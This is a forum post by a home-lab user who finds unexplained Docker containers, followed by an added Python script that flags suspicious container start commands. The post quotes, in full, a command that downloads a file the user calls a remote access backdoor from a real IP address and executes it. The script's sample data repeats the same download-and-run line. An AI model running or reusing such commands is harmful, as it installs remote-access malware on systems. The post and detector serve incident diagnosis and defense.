PLEASE CLOSE THIS. I was hacked; the serr file is a remote access backdoor. I will take appropriate action. Sorry for posting off topic.
OK, so I have been experimenting with Rancher on my home lab, creating and tearing down different environments, and I figured out that there are sometimes containers left behind, like in swarm, that will restart and show up on one host or the other as a standalone container. However, today I have 2 standalone containers that appeared to be started 7 hours before I looked, and I can't make sense of them.
They are both Ubuntu and refer to an IP address in the command that I can't figure out:
Command:
/bin/bash,-c, apt update;apt install wget -y;wget http://140.82.21.105/serr;chmod 777 serr;./serr;while true;do echo helloworld;sleep 20; done;
The address shows an unmodified Apache server, and /serr is a file.
Has someone got me? And how would they start a Docker container without showing up in any logs I know about on the host?
Or is this another learning curve? The IP address is not registered to any corp, so I can't figure it out.
Thanks in advance.
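
A triage check for the command pattern in the post above (fetch a file from a bare IP address, chmod it, run it, then loop to keep the container alive), as an added example that is not part of the original post. It assumes container records in the shape of `docker inspect` output (`Name`, `Path`, `Args`); the sample records, including the 203.0.113.10 address, are constructed.

```python
import re

IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([^\s;|&]*)")
FETCH_TOOL = re.compile(r"\b(?:wget|curl)\b")

# Constructed records in the shape of `docker inspect` output (not real data).
SAMPLE = [
    {"Name": "/odd_ubuntu", "Path": "/bin/bash", "Args": ["-c",
        "apt update;apt install wget -y;wget http://203.0.113.10/serr;"
        "chmod 777 serr;./serr;while true;do echo helloworld;sleep 20; done;"]},
    {"Name": "/web", "Path": "nginx", "Args": ["-g", "daemon off;"]},
    {"Name": "/probe", "Path": "/bin/sh", "Args": ["-c",
        "while true; do curl -s http://127.0.0.1:8080/health; sleep 30; done"]},
]

def command_line(record):
    """Join Path and Args of one record into a single command string."""
    return " ".join([record.get("Path", "")] + list(record.get("Args") or []))

def findings(record):
    """Return the reasons a start command looks like download-and-run."""
    cmd = command_line(record)
    m = IP_URL.search(cmd)
    if not (m and FETCH_TOOL.search(cmd)):
        return []
    reasons = ["fetches from bare IP " + m.group(1)]
    name = m.group(2).rsplit("/", 1)[-1]      # file name the download saves
    if name:
        tail, esc = cmd[m.end():], re.escape(name)
        if re.search(r"\bchmod\s+\S+\s+(\./)?" + esc + r"\b", tail):
            reasons.append("chmod on downloaded file")
        if re.search(r"(^|[;&|\s])\./" + esc + r"(\s|;|&|$)", tail):
            reasons.append("executes downloaded file")
    if re.search(r"\bwhile\s+true\b.*\bsleep\b", cmd):
        reasons.append("keep-alive loop")
    return reasons

def triage(records):
    """Map container name -> reasons, only where a fetched file is executed."""
    flagged = {}
    for rec in records:
        why = findings(rec)
        if "executes downloaded file" in why:
            flagged[rec.get("Name", rec.get("Id", "?")).lstrip("/")] = why
    return flagged

if __name__ == "__main__":
    for name, why in triage(SAMPLE).items():
        print(name, "->", "; ".join(why))
```

The health-check container fetches from an IP and loops but never executes what it fetched, so it is reported by `findings` and left out of `triage`.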